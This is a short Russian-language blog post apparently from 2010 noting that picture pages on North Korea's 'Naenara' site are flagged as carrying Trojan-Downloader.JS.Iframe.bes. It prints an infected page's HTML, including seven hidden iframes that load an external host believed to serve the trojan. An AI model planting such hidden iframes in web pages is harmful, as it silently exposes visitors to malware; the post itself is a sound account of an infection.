 |
 |
|||
 |
 |
|||
 |
Славные следы самоотвержения народного руководства Интернетом :)Я уже писал как-то о северокорейском интернете и сайте "Нэнара". Сегодня он явился мне в неожиданном аспекте - "Нэнара" заражена троянами. Например, вот с этого URL, давшего название заметке, все являющиеся линками фотки товарища Ким Чен Ира определяются как заражённые трояном Trojan-Downloader.JS.Iframe.bes. Разумеется, в html-файлах содержатся только ссылки на URL, содержащий опасный код. Традиционно для троянов этого класса Trojan-Downloader.JS.Iframe.bes обнаруживает себя по скрытым фреймам <iframe>, вставленным в код файлов *.html. Исходник, в частности, "моего" поражённого файла html выглядит так: <script>
function resize_win(){
resizeTo( img.width + 10, img.height + 200 );
}
</script>
<body onLoad="resize_win();" LEFTMARGIN="0" RIGHTMARGIN="0"
BOTTOMMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<table align="center" cellspacing="0" cellpadding="0" border="0">
<tr>
<td align="center">
<IMG id="img"s src="/images/event/2010-02-16/1-0.jpg">
</td>
</tr>
<tr>
<td align="center" style="font-size:15px">
В Металлургическом объединении имени Сентября
</td>
</tr>
</table>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
</body>
Как видим, польские товарищи приютили у себя троян, на который ссылаются заражённые страницы товарищей северокорейских. Кстати, недавно северокорейские товарищи выпустили и правильную социалистическую операционку "Красная звезда". корея интернет вирус комментарии (0) 28.02.10, 22:30; рейтинг:135 |
 |
||
|
|
|
||
 |
 |
